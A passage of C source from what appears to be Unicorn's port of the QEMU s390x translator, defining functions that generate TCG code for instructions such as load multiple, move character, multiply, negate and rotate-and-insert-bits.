*/ t1 = tcg_temp_new_i64(tcg_ctx); if (unlikely(r1 == r3)) { tcg_gen_qemu_ld32u(tcg_ctx, t1, o->in2, get_mem_index(s)); store_reg32h_i64(tcg_ctx, r1, t1); tcg_temp_free(tcg_ctx, t1); return DISAS_NEXT; } /* First load the values of the first and last registers to trigger possible page faults. */ t2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld32u(tcg_ctx, t1, o->in2, get_mem_index(s)); tcg_gen_addi_i64(tcg_ctx, t2, o->in2, 4 * ((r3 - r1) & 15)); tcg_gen_qemu_ld32u(tcg_ctx, t2, t2, get_mem_index(s)); store_reg32h_i64(tcg_ctx, r1, t1); store_reg32h_i64(tcg_ctx, r3, t2); /* Only two registers to read. */ if (((r1 + 1) & 15) == r3) { tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, t1); return DISAS_NEXT; } /* Then load the remaining registers. Page fault can't occur. */ r3 = (r3 - 1) & 15; tcg_gen_movi_i64(tcg_ctx, t2, 4); while (r1 != r3) { r1 = (r1 + 1) & 15; tcg_gen_add_i64(tcg_ctx, o->in2, o->in2, t2); tcg_gen_qemu_ld32u(tcg_ctx, t1, o->in2, get_mem_index(s)); store_reg32h_i64(tcg_ctx, r1, t1); } tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, t1); return DISAS_NEXT; } static DisasJumpType op_lm64(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); int r3 = get_field(s, r3); TCGv_i64 t1, t2; /* Only one register to read. */ if (unlikely(r1 == r3)) { tcg_gen_qemu_ld64(tcg_ctx, tcg_ctx->regs[r1], o->in2, get_mem_index(s)); return DISAS_NEXT; } /* First load the values of the first and last registers to trigger possible page faults. */ t1 = tcg_temp_new_i64(tcg_ctx); t2 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld64(tcg_ctx, t1, o->in2, get_mem_index(s)); tcg_gen_addi_i64(tcg_ctx, t2, o->in2, 8 * ((r3 - r1) & 15)); tcg_gen_qemu_ld64(tcg_ctx, tcg_ctx->regs[r3], t2, get_mem_index(s)); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->regs[r1], t1); tcg_temp_free(tcg_ctx, t2); /* Only two registers to read. */ if (((r1 + 1) & 15) == r3) { tcg_temp_free(tcg_ctx, t1); return DISAS_NEXT; } /* Then load the remaining registers. Page fault can't occur. */ r3 = (r3 - 1) & 15; tcg_gen_movi_i64(tcg_ctx, t1, 8); while (r1 != r3) { r1 = (r1 + 1) & 15; tcg_gen_add_i64(tcg_ctx, o->in2, o->in2, t1); tcg_gen_qemu_ld64(tcg_ctx, tcg_ctx->regs[r1], o->in2, get_mem_index(s)); } tcg_temp_free(tcg_ctx, t1); return DISAS_NEXT; } static DisasJumpType op_lpd(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 a1, a2; MemOp mop = s->insn->data; /* In a parallel context, stop the world and single step. */ if (tb_cflags(s->base.tb) & CF_PARALLEL) { update_psw_addr(s); update_cc_op(s); gen_exception(tcg_ctx, EXCP_ATOMIC); return DISAS_NORETURN; } /* In a serial context, perform the two loads ... */ a1 = get_address(s, 0, get_field(s, b1), get_field(s, d1)); a2 = get_address(s, 0, get_field(s, b2), get_field(s, d2)); tcg_gen_qemu_ld_i64(tcg_ctx, o->out, a1, get_mem_index(s), mop | MO_ALIGN); tcg_gen_qemu_ld_i64(tcg_ctx, o->out2, a2, get_mem_index(s), mop | MO_ALIGN); tcg_temp_free_i64(tcg_ctx, a1); tcg_temp_free_i64(tcg_ctx, a2); /* ... and indicate that we performed them while interlocked. 
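CC 0 (set just below) tells the guest that the two loads appeared block-concurrent; the truly parallel case was already diverted to EXCP_ATOMIC above.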
*/ gen_op_movi_cc(s, 0); return DISAS_NEXT; } static DisasJumpType op_lpq(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!(tb_cflags(s->base.tb) & CF_PARALLEL)) { gen_helper_lpq(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2); } else if (HAVE_ATOMIC128) { gen_helper_lpq_parallel(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2); } else { gen_helper_exit_atomic(tcg_ctx, tcg_ctx->cpu_env); return DISAS_NORETURN; } return_low128(tcg_ctx, o->out2); return DISAS_NEXT; } static DisasJumpType op_lura(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->addr1 = get_address(s, 0, get_field(s, r2), 0); tcg_gen_qemu_ld_tl(tcg_ctx, o->out, o->addr1, MMU_REAL_IDX, s->insn->data); return DISAS_NEXT; } static DisasJumpType op_lzrb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_andi_i64(tcg_ctx, o->out, o->in2, -256); return DISAS_NEXT; } static DisasJumpType op_lcbb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const int64_t block_size = (1ull << (get_field(s, m3) + 6)); if (get_field(s, m3) > 6) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } tcg_gen_ori_i64(tcg_ctx, o->addr1, o->addr1, -block_size); tcg_gen_neg_i64(tcg_ctx, o->addr1, o->addr1); tcg_gen_movi_i64(tcg_ctx, o->out, 16); tcg_gen_umin_i64(tcg_ctx, o->out, o->out, o->addr1); gen_op_update1_cc_i64(s, CC_OP_LCBB, o->out); return DISAS_NEXT; } static DisasJumpType op_mov2(DisasContext *s, DisasOps *o) { o->out = o->in2; o->g_out = o->g_in2; o->in2 = NULL; o->g_in2 = false; return DISAS_NEXT; } static DisasJumpType op_mov2e(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int b2 = get_field(s, b2); TCGv ar1 = tcg_temp_new_i64(tcg_ctx); o->out = o->in2; o->g_out = o->g_in2; o->in2 = NULL; o->g_in2 = false; switch (s->base.tb->flags & FLAG_MASK_ASC) { case PSW_ASC_PRIMARY >> FLAG_MASK_PSW_SHIFT: tcg_gen_movi_i64(tcg_ctx, ar1, 0); break; case PSW_ASC_ACCREG >> FLAG_MASK_PSW_SHIFT: tcg_gen_movi_i64(tcg_ctx, ar1, 1); break; case PSW_ASC_SECONDARY >> FLAG_MASK_PSW_SHIFT: if (b2) { tcg_gen_ld32u_i64(tcg_ctx, ar1, tcg_ctx->cpu_env, offsetof(CPUS390XState, aregs[b2])); } else { tcg_gen_movi_i64(tcg_ctx, ar1, 0); } break; case PSW_ASC_HOME >> FLAG_MASK_PSW_SHIFT: tcg_gen_movi_i64(tcg_ctx, ar1, 2); break; } tcg_gen_st32_i64(tcg_ctx, ar1, tcg_ctx->cpu_env, offsetof(CPUS390XState, aregs[1])); tcg_temp_free_i64(tcg_ctx, ar1); return DISAS_NEXT; } static DisasJumpType op_movx(DisasContext *s, DisasOps *o) { o->out = o->in1; o->out2 = o->in2; o->g_out = o->g_in1; o->g_out2 = o->g_in2; o->in1 = NULL; o->in2 = NULL; o->g_in1 = o->g_in2 = false; return DISAS_NEXT; } static DisasJumpType op_mvc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 l = tcg_const_i32(tcg_ctx, get_field(s, l1)); gen_helper_mvc(tcg_ctx, tcg_ctx->cpu_env, l, o->addr1, o->in2); tcg_temp_free_i32(tcg_ctx, l); return DISAS_NEXT; } static DisasJumpType op_mvcin(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 l = tcg_const_i32(tcg_ctx, get_field(s, l1)); gen_helper_mvcin(tcg_ctx, tcg_ctx->cpu_env, l, o->addr1, o->in2); tcg_temp_free_i32(tcg_ctx, l); return DISAS_NEXT; } static DisasJumpType op_mvcl(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); int r2 = get_field(s, r2); TCGv_i32 t1, t2; /* r1 and r2 must be even. 
*/ if (r1 & 1 || r2 & 1) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } t1 = tcg_const_i32(tcg_ctx, r1); t2 = tcg_const_i32(tcg_ctx, r2); gen_helper_mvcl(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, t1, t2); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_mvcle(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); int r3 = get_field(s, r3); TCGv_i32 t1, t3; /* r1 and r3 must be even. */ if (r1 & 1 || r3 & 1) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } t1 = tcg_const_i32(tcg_ctx, r1); t3 = tcg_const_i32(tcg_ctx, r3); gen_helper_mvcle(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, t1, o->in2, t3); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t3); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_mvclu(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); int r3 = get_field(s, r3); TCGv_i32 t1, t3; /* r1 and r3 must be even. */ if (r1 & 1 || r3 & 1) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } t1 = tcg_const_i32(tcg_ctx, r1); t3 = tcg_const_i32(tcg_ctx, r3); gen_helper_mvclu(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, t1, o->in2, t3); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t3); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_mvcos(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r3 = get_field(s, r3); gen_helper_mvcos(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->addr1, o->in2, tcg_ctx->regs[r3]); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_mvcp(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, l1); gen_helper_mvcp(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, tcg_ctx->regs[r1], o->addr1, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_mvcs(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, l1); gen_helper_mvcs(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, tcg_ctx->regs[r1], o->addr1, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_mvn(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 l = tcg_const_i32(tcg_ctx, get_field(s, l1)); gen_helper_mvn(tcg_ctx, tcg_ctx->cpu_env, l, o->addr1, o->in2); tcg_temp_free_i32(tcg_ctx, l); return DISAS_NEXT; } static DisasJumpType op_mvo(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 l = tcg_const_i32(tcg_ctx, get_field(s, l1)); gen_helper_mvo(tcg_ctx, tcg_ctx->cpu_env, l, o->addr1, o->in2); tcg_temp_free_i32(tcg_ctx, l); return DISAS_NEXT; } static DisasJumpType op_mvpg(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_mvpg(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, tcg_ctx->regs[0], o->in1, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_mvst(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 t2 = tcg_const_i32(tcg_ctx, get_field(s, r2)); gen_helper_mvst(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, t1, t2); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_mvz(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 l = tcg_const_i32(tcg_ctx, get_field(s, l1)); gen_helper_mvz(tcg_ctx, tcg_ctx->cpu_env, l, 
o->addr1, o->in2); tcg_temp_free_i32(tcg_ctx, l); return DISAS_NEXT; } static DisasJumpType op_mul(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_mul_i64(tcg_ctx, o->out, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_mul128(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_mulu2_i64(tcg_ctx, o->out2, o->out, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_meeb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_meeb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_mdeb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_mdeb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_mdb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_mdb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_mxb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_mxb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->out, o->out2, o->in1, o->in2); return_low128(tcg_ctx, o->out2); return DISAS_NEXT; } static DisasJumpType op_mxdb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_mxdb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->out, o->out2, o->in2); return_low128(tcg_ctx, o->out2); return DISAS_NEXT; } static DisasJumpType op_maeb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 r3 = load_freg32_i64(tcg_ctx, get_field(s, r3)); gen_helper_maeb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2, r3); tcg_temp_free_i64(tcg_ctx, r3); return DISAS_NEXT; } static DisasJumpType op_madb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 r3 = load_freg(tcg_ctx, get_field(s, r3)); gen_helper_madb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2, r3); tcg_temp_free_i64(tcg_ctx, r3); return DISAS_NEXT; } static DisasJumpType op_mseb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 r3 = load_freg32_i64(tcg_ctx, get_field(s, r3)); gen_helper_mseb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2, r3); tcg_temp_free_i64(tcg_ctx, r3); return DISAS_NEXT; } static DisasJumpType op_msdb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 r3 = load_freg(tcg_ctx, get_field(s, r3)); gen_helper_msdb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2, r3); tcg_temp_free_i64(tcg_ctx, r3); return DISAS_NEXT; } static DisasJumpType op_nabs(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 z, n; z = tcg_const_i64(tcg_ctx, 0); n = tcg_temp_new_i64(tcg_ctx); tcg_gen_neg_i64(tcg_ctx, n, o->in2); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_GE, o->out, o->in2, z, n, o->in2); tcg_temp_free_i64(tcg_ctx, n); tcg_temp_free_i64(tcg_ctx, z); return DISAS_NEXT; } static DisasJumpType op_nabsf32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_ori_i64(tcg_ctx, o->out, o->in2, 0x80000000ull); return DISAS_NEXT; } static DisasJumpType op_nabsf64(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_ori_i64(tcg_ctx, o->out, o->in2, 0x8000000000000000ull); return DISAS_NEXT; } static DisasJumpType op_nabsf128(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_ori_i64(tcg_ctx, o->out, o->in1, 0x8000000000000000ull); tcg_gen_mov_i64(tcg_ctx, o->out2, o->in2); return DISAS_NEXT; } static 
DisasJumpType op_nc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 l = tcg_const_i32(tcg_ctx, get_field(s, l1)); gen_helper_nc(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, l, o->addr1, o->in2); tcg_temp_free_i32(tcg_ctx, l); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_neg(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_neg_i64(tcg_ctx, o->out, o->in2); return DISAS_NEXT; } static DisasJumpType op_negf32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_xori_i64(tcg_ctx, o->out, o->in2, 0x80000000ull); return DISAS_NEXT; } static DisasJumpType op_negf64(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_xori_i64(tcg_ctx, o->out, o->in2, 0x8000000000000000ull); return DISAS_NEXT; } static DisasJumpType op_negf128(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_xori_i64(tcg_ctx, o->out, o->in1, 0x8000000000000000ull); tcg_gen_mov_i64(tcg_ctx, o->out2, o->in2); return DISAS_NEXT; } static DisasJumpType op_oc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 l = tcg_const_i32(tcg_ctx, get_field(s, l1)); gen_helper_oc(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, l, o->addr1, o->in2); tcg_temp_free_i32(tcg_ctx, l); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_or(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_or_i64(tcg_ctx, o->out, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_ori(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int shift = s->insn->data & 0xff; int size = s->insn->data >> 8; uint64_t mask = ((1ull << size) - 1) << shift; assert(!o->g_in2); tcg_gen_shli_i64(tcg_ctx, o->in2, o->in2, shift); tcg_gen_or_i64(tcg_ctx, o->out, o->in1, o->in2); /* Produce the CC from only the bits manipulated. */ tcg_gen_andi_i64(tcg_ctx, tcg_ctx->cc_dst, o->out, mask); set_cc_nz_u64(s, tcg_ctx->cc_dst); return DISAS_NEXT; } static DisasJumpType op_oi(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; o->in1 = tcg_temp_new_i64(tcg_ctx); if (!s390_has_feat(s->uc, S390_FEAT_INTERLOCKED_ACCESS_2)) { tcg_gen_qemu_ld_tl(tcg_ctx, o->in1, o->addr1, get_mem_index(s), s->insn->data); } else { /* Perform the atomic operation in memory. */ tcg_gen_atomic_fetch_or_i64(tcg_ctx, o->in1, o->addr1, o->in2, get_mem_index(s), s->insn->data); } /* Recompute also for atomic case: needed for setting CC. */ tcg_gen_or_i64(tcg_ctx, o->out, o->in1, o->in2); if (!s390_has_feat(s->uc, S390_FEAT_INTERLOCKED_ACCESS_2)) { tcg_gen_qemu_st_tl(tcg_ctx, o->out, o->addr1, get_mem_index(s), s->insn->data); } return DISAS_NEXT; } static DisasJumpType op_pack(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 l = tcg_const_i32(tcg_ctx, get_field(s, l1)); gen_helper_pack(tcg_ctx, tcg_ctx->cpu_env, l, o->addr1, o->in2); tcg_temp_free_i32(tcg_ctx, l); return DISAS_NEXT; } static DisasJumpType op_pka(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int l2 = get_field(s, l2) + 1; TCGv_i32 l; /* The length must not exceed 32 bytes. 
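The L2 field encodes length minus one, so after the +1 above the usable range is 1-32 bytes; anything larger raises a specification exception.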
*/ if (l2 > 32) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } l = tcg_const_i32(tcg_ctx, l2); gen_helper_pka(tcg_ctx, tcg_ctx->cpu_env, o->addr1, o->in2, l); tcg_temp_free_i32(tcg_ctx, l); return DISAS_NEXT; } static DisasJumpType op_pku(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int l2 = get_field(s, l2) + 1; TCGv_i32 l; /* The length must be even and should not exceed 64 bytes. */ if ((l2 & 1) || (l2 > 64)) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } l = tcg_const_i32(tcg_ctx, l2); gen_helper_pku(tcg_ctx, tcg_ctx->cpu_env, o->addr1, o->in2, l); tcg_temp_free_i32(tcg_ctx, l); return DISAS_NEXT; } static DisasJumpType op_popcnt(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_popcnt(tcg_ctx, o->out, o->in2); return DISAS_NEXT; } static DisasJumpType op_ptlb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_ptlb(tcg_ctx, tcg_ctx->cpu_env); return DISAS_NEXT; } static DisasJumpType op_risbg(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int i3 = get_field(s, i3); int i4 = get_field(s, i4); int i5 = get_field(s, i5); int do_zero = i4 & 0x80; uint64_t mask, imask, pmask; int pos, len, rot; /* Adjust the arguments for the specific insn. */ switch (s->fields.op2) { case 0x55: /* risbg */ case 0x59: /* risbgn */ i3 &= 63; i4 &= 63; pmask = ~0; break; case 0x5d: /* risbhg */ i3 &= 31; i4 &= 31; pmask = 0xffffffff00000000ull; break; case 0x51: /* risblg */ i3 &= 31; i4 &= 31; pmask = 0x00000000ffffffffull; break; default: // g_assert_not_reached(); break; } /* MASK is the set of bits to be inserted from R2. Take care for I3/I4 wraparound. */ mask = pmask >> i3; if (i3 <= i4) { mask ^= pmask >> i4 >> 1; } else { mask |= ~(pmask >> i4 >> 1); } mask &= pmask; /* IMASK is the set of bits to be kept from R1. In the case of the high/low insns, we need to keep the other half of the register. */ imask = ~mask | ~pmask; if (do_zero) { imask = ~pmask; } len = i4 - i3 + 1; pos = 63 - i4; rot = i5 & 63; if (s->fields.op2 == 0x5d) { pos += 32; } /* In some cases we can implement this with extract. */ if (imask == 0 && pos == 0 && len > 0 && len <= rot) { tcg_gen_extract_i64(tcg_ctx, o->out, o->in2, 64 - rot, len); return DISAS_NEXT; } /* In some cases we can implement this with deposit. */ if (len > 0 && (imask == 0 || ~mask == imask)) { /* Note that we rotate the bits to be inserted to the lsb, not to the position as described in the PoO. */ rot = (rot - pos) & 63; } else { pos = -1; } /* Rotate the input as necessary. */ tcg_gen_rotli_i64(tcg_ctx, o->in2, o->in2, rot); /* Insert the selected bits into the output. */ if (pos >= 0) { if (imask == 0) { tcg_gen_deposit_z_i64(tcg_ctx, o->out, o->in2, pos, len); } else { tcg_gen_deposit_i64(tcg_ctx, o->out, o->out, o->in2, pos, len); } } else if (imask == 0) { tcg_gen_andi_i64(tcg_ctx, o->out, o->in2, mask); } else { tcg_gen_andi_i64(tcg_ctx, o->in2, o->in2, mask); tcg_gen_andi_i64(tcg_ctx, o->out, o->out, imask); tcg_gen_or_i64(tcg_ctx, o->out, o->out, o->in2); } return DISAS_NEXT; } static DisasJumpType op_rosbg(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int i3 = get_field(s, i3); int i4 = get_field(s, i4); int i5 = get_field(s, i5); uint64_t mask; /* If this is a test-only form, arrange to discard the result. */ if (i3 & 0x80) { o->out = tcg_temp_new_i64(tcg_ctx); o->g_out = false; } i3 &= 63; i4 &= 63; i5 &= 63; /* MASK is the set of bits to be operated on from R2. 
Take care for I3/I4 wraparound. */ mask = ~0ull >> i3; if (i3 <= i4) { mask ^= ~0ull >> i4 >> 1; } else { mask |= ~(~0ull >> i4 >> 1); } /* Rotate the input as necessary. */ tcg_gen_rotli_i64(tcg_ctx, o->in2, o->in2, i5); /* Operate. */ switch (s->fields.op2) { case 0x54: /* AND */ tcg_gen_ori_i64(tcg_ctx, o->in2, o->in2, ~mask); tcg_gen_and_i64(tcg_ctx, o->out, o->out, o->in2); break; case 0x56: /* OR */ tcg_gen_andi_i64(tcg_ctx, o->in2, o->in2, mask); tcg_gen_or_i64(tcg_ctx, o->out, o->out, o->in2); break; case 0x57: /* XOR */ tcg_gen_andi_i64(tcg_ctx, o->in2, o->in2, mask); tcg_gen_xor_i64(tcg_ctx, o->out, o->out, o->in2); break; default: abort(); } /* Set the CC. */ tcg_gen_andi_i64(tcg_ctx, tcg_ctx->cc_dst, o->out, mask); set_cc_nz_u64(s, tcg_ctx->cc_dst); return DISAS_NEXT; } static DisasJumpType op_rev16(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_bswap16_i64(tcg_ctx, o->out, o->in2); return DISAS_NEXT; } static DisasJumpType op_rev32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_bswap32_i64(tcg_ctx, o->out, o->in2); return DISAS_NEXT; } static DisasJumpType op_rev64(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_bswap64_i64(tcg_ctx, o->out, o->in2); return DISAS_NEXT; } static DisasJumpType op_rll32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 to = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, t1, o->in1); tcg_gen_extrl_i64_i32(tcg_ctx, t2, o->in2); tcg_gen_rotl_i32(tcg_ctx, to, t1, t2); tcg_gen_extu_i32_i64(tcg_ctx, o->out, to); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, to); return DISAS_NEXT; } static DisasJumpType op_rll64(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_rotl_i64(tcg_ctx, o->out, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_rrbe(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_rrbe(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_sacf(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_sacf(tcg_ctx, tcg_ctx->cpu_env, o->in2); /* Addressing mode has changed, so end the block. */ return DISAS_PC_STALE; } static DisasJumpType op_sam(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int sam = s->insn->data; TCGv_i64 tsam; uint64_t mask; switch (sam) { case 0: mask = 0xffffff; break; case 1: mask = 0x7fffffff; break; default: mask = -1; break; } /* Bizarre but true, we check the address of the current insn for the specification exception, not the next to be executed. Thus the PoO documents that Bad Things Happen two bytes before the end. */ if (s->base.pc_next & ~mask) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } s->pc_tmp &= mask; tsam = tcg_const_i64(tcg_ctx, sam); tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->psw_mask, tcg_ctx->psw_mask, tsam, 31, 2); tcg_temp_free_i64(tcg_ctx, tsam); /* Always exit the TB, since we (may have) changed execution mode. 
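The deposit above rewrote the addressing-mode bits of the PSW mask, so translations chained under the old mode can no longer be trusted.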
*/ return DISAS_PC_STALE; } static DisasJumpType op_sar(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); tcg_gen_st32_i64(tcg_ctx, o->in2, tcg_ctx->cpu_env, offsetof(CPUS390XState, aregs[r1])); return DISAS_NEXT; } static DisasJumpType op_seb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_seb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_sdb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_sdb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_sxb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_sxb(tcg_ctx, o->out, tcg_ctx->cpu_env, 